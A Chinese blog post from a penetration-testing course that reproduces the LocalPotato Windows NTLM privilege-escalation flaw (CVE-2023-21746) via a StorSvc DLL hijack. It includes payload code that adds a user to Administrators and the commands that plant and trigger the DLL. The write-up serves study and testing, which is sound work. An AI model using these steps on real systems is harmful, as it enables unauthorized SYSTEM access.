【渗透测试实践课程】cve-2023-21746漏洞复现,Windows NTLM漏洞

最新推荐文章于 2024-05-16 15:26:57 发布
最新推荐文章于 2024-05-16 15:26:57 发布
阅读量730 收藏
点赞数
文章标签: 网络安全 windows 系统安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63591520/article/details/131351729
版权

Windows NTLM 在进行身份验证时存在漏洞“LocalPotato”,允许拥有低权限的本地攻击者通过运行特制程序将权限提升至SYSTEM。

影响版本:

Windows Server 2012 R2

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2012 R2 (Server Core installation)

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 22H2 for 32-bit Systems

Windows 10 Version 22H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 version 21H2 for ARM64-based Systems

Windows 11 version 21H2 for x64-based Systems

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

1.1 NTLM本地身份验证

类型 1 消息: 客户端发送此消息以启动连接。它用于像以前一样协商身份验证参数,但也包含客户端计算机的名称及其域。服务器可以检查客户端的名称和域,如果它们与自己的名称和域匹配,则开始本地身份验证过程。
类型 2 消息: 服务器创建安全上下文,并在此消息中将其 ID 发送回客户端。然后,客户端可以使用安全上下文 ID 将自身与连接关联。
类型 3 消息: 如果客户端成功地将自身与现有安全上下文 ID 关联,则会向服务器发送一条空的 Type 3 消息,以指示本地身份验证过程成功。

1.2 NTLM 漏洞利用

在本地的同一台机器上,会存在一个“中间人”,也就是我们熟悉的LSASS,它在NTLM本地认证过程中,担任中间人的角色,负责的工作很多,包括生成message、生成对应token值、检查身份许可等等,因为全部本地NTLM认证都调用LSASS完成,也就导致了接下来的漏洞利用方式。

1.3  NTLM漏洞攻击

1. 首先攻击者会令一个高权限程序和由攻击者编写的恶意服务端进行连接,这一步和之前的 potato 漏洞利用比较类似。
2. 恶意服务端和正常的服务端程序一样,会实例化一个 security context A ,然后先不发送给高权限客户端。紧接着,攻击者编写的恶意客户端会尝试和本地 SMB 服务器程序进行连接,按照权限来说,是没有办法完成整个本地 NTLM 认证过程的,但这里攻击者利用时间差,将 SMB 服务器程序返回的 security context B 和之前生成的 security context A 交换 —— security context B 返回给高权限客户端,这样高权限客户端会将高权限用户( SYSTEM )与 security context B 绑定,而这个字段是恶意客户端与 SMB 服务器连接的时候获得的,这样一来,由恶意客户端发起的本地 NTLM 认证就变为有效认证,此时恶意客户端返回空的 Type 3 message ,整个认证过程完成。
3. 使用 SMB 服务,攻击者就可以成功将文件写入到机器的任意位置而不受权限的约束,因为此时的攻击者已经拥有了 SYSTEM 的权限。

1.4 Windows提权

为了实现实战中可以利用该漏洞的目的,需要重新找到一种方法让写入的文件被调用。这种方法不止一种,这里介绍一种比较新的提权方式:LPE via StorSvc。具体来说,这就是一个标准的dll劫持方法,只是这里用到的位置是在windows系统中。

Storage ServiceWin32 服务。当所有版本的 Windows10 2004Windows10 20H2Windows10 21H1Windows10 21H2Windows10 22H2中的操作系统启动时,此服务将自动启动。当 Storage Service 启动时,它在 svchost.exe 和其他服务的共享进程中作为 Local System 运行。 Storage服务使用位于 C: Windows system32目录中的 StorSvc.dll 文件。

2 漏洞复现:

复现环境:

windows10 20H2

2.1 exp代码参考:https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc

https://github.com/decoder-it/LocalPotato

打开 LPE via StorSvc\RpcClient\RpcClient\storsvc_c.c ,根据环境选择正确 RPC 接口标识符。

#if defined(_M_AMD64)

//#define WIN10
//#define WIN11
#define WIN2019
//#define WIN2022

...

打开 LPE via StorSvc\SprintCSP\SprintCSP\main.c ,根据需要选择执行的命令。

void DoStuff() {

    // Replace all this code by your payload
    STARTUPINFO si = { sizeof(STARTUPINFO) };
    PROCESS_INFORMATION pi;
    CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add",
        NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    return;
}

分别在Visual Studio中编译出SprintCSP.dll、RpcClient.exe和localpotato.exe文件。

2.2 复现:

验证当前用户是否属于该 组:Administrators

net user user

通过使用 LocalPotato,将 SprintCSP.dll 复制到 system32 中

LocalPotato.exe -i SprintCSP.dll -o \Windows\System32\SprintCSP.dll

 运行RpcClient.exe以触发对SprintCSP.dll的调用,有效地执行 DLL 中的有效负载:

./RpcClient.exe

结果为:[+] Dll hijack triggered! ,证明有可能攻击成功了(攻击不成功也是有可能返回这个结果的,需要具体情况具体分析)

注意:对同目标的第二次攻击是会提示需要重启StorSvc服务的,否则无法完成攻击,但这个服务的重启又需要管理员的权限,低权限用户只能通过重启解决这个问题:

重启或注销用户,登入后再次验证当前用户是否属于该 组:Administrators

net user user

 成功完成本地提权。

参考文献:

localpotato实战化漏洞利用及分析

LocalPotato - When Swapping The Context Leads You To SYSTEM

TryHackMe | LocalPotato

亱沭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
pyLoad远程代码执行漏洞复现(CVE-2023-0297)
0xSec
01-30 2782
pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。
漏洞复现2023HVV WPS Office 远程代码执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
09-08 2524
Office中的WebExtension是一种用于扩展Microsoft Office功能的技术。Office插件使第三方开发者能够在Office应用程序中集成自己的服务和功能。这些插件采用跨平台的Web技术(如HTML,CSS和JavaScript)开发,可以在不同的平台和设备上运行。简单理解就是Office内置了一个浏览器,可以解析html/javascript/css代码,本次的漏洞,就是WPS在处理WebExtension时,未能正确的处理javascript代码,造成了溢出RCE。
GeoServer SQL 注入漏洞复现CVE-2023-25157)附poc_geoserverl漏洞(1)
最新发布
2401_84240129的博客
05-16 531
在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码。
漏洞复现学习:openfire鉴权绕过漏洞复现CVE-2023-32315)
jjjjj34的博客
01-03 1215
第一张图里的代码,它会先判读是否含有setup/setup-*,如过含有就会跳到下面的判读,接下来的判断就是对用户输入的字符串进行一个过滤,如果用户输入的字符串不含有。这串代码就是openfire的鉴权机制,我们看到这红框中的最后有一个通配符,而我们可以利用这个通配符从而达到绕过openfire的鉴权机制。,编码为%u002e,验证payload:/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp。和%2e,则返回true。和%2e被过滤了,那我们就将。
CVE-2023-21839 Weblogic远程代码执行漏洞复现
热爱学习,喜欢折腾!
04-24 773
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_50854662的博客
02-28 1100
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码
08-23
CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞。 卡巴斯基披露该在野0day提权漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system权限———...
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 578
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
CVE-2023–22809漏洞利用|复现
Musda的博客
06-22 667
首先需要检查sudoedit版本此漏洞的利用范围仅限于。
CVE-2023-33246 RCE漏洞复现
七堇年的博客
06-08 1959
在RocketMQ 5.1.0及以下版本在一定条件下,会存在远程命令执行风险;由于RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外攻击者还可以通过伪造 RocketMQ 协议内容来达到同样的效果。
CVE复现计划】CVE-2023-27179
m0_63138919的博客
04-01 586
本文以春秋云镜为靶场,进行该CVE-2023-27179的漏洞原理学习,记录自己学习过程,还请大佬们师傅们指出文中错误
Hadoop生态漏洞修复记录
manweizhizhuxia的博客
03-28 2930
Hadoop、zookeeper、hive漏洞修复
【阿里云大数据产品MaxCompute(原名ODPS)】DT时代企业数据资产的护卫舰
weixin_33694172的博客
01-25 230
免费开通大数据服务:https://www.aliyun.com/product/odps 阿里云数加MaxCompute(原名ODPS)设计之初就是面向多租户,确保租户的数据安全是MaxCompute的必备功能之一。在MaxCompute系统的安全设计和实现上,MaxCompute的工程师们会遵循一些经过实践检验的安全设计原则(如Saltzer-Sch...
Eclipse Jetty server漏洞解决
qq_42222680的博客
02-10 7282
Eclipse Jetty 服务器伪路径请求绕过漏洞(Linux)
泛微 E-Office文件上传漏洞复现CVE-2023-2523、CVE-2023-2648)
热门推荐
0xSec
05-23 1万+
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 9.5版本,源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。
cve-2023-44313漏洞
02-03
CVE-2023-44313是一个安全漏洞,其涉及到某个特定软件或系统的代码中存在的问题。该漏洞可能导致攻击者利用该软件或系统的弱点,来执行恶意代码或获取未授权的访问权限。 对于CVE-2023-44313漏洞,它可能具有多种不同的影响。例如,攻击者可能能够通过利用该漏洞,绕过身份验证机制并访问系统中的敏感数据。此外,他们还可以执行未经授权的命令,使系统陷入不稳定状态,甚至导致系统崩溃。 为了解决CVE-2023-44313漏洞,软件或系统的开发者通常会发布一个安全更新或补丁程序。这个补丁会修复软件或系统中存在的漏洞,加强安全性并防止攻击者利用该漏洞。因此,作为用户,我们应该及时安装这些更新或补丁,以确保自己的系统免受该漏洞的影响。 此外,我们还可以采取其他一些措施来防止CVE-2023-44313漏洞的利用。例如,我们应该确保使用的软件和系统是最新版本,因为较旧的版本可能会存在已知的漏洞。此外,保持杀毒软件和防火墙的最新更新也是很重要的,因为它们可以帮助我们检测和阻止潜在的恶意活动。 总之,CVE-2023-44313漏洞是一个需要引起关注并及时处理的安全漏洞。通过安装最新的安全更新和补丁,以及保持软件和系统的最新版本,我们可以显著降低受到该漏洞攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值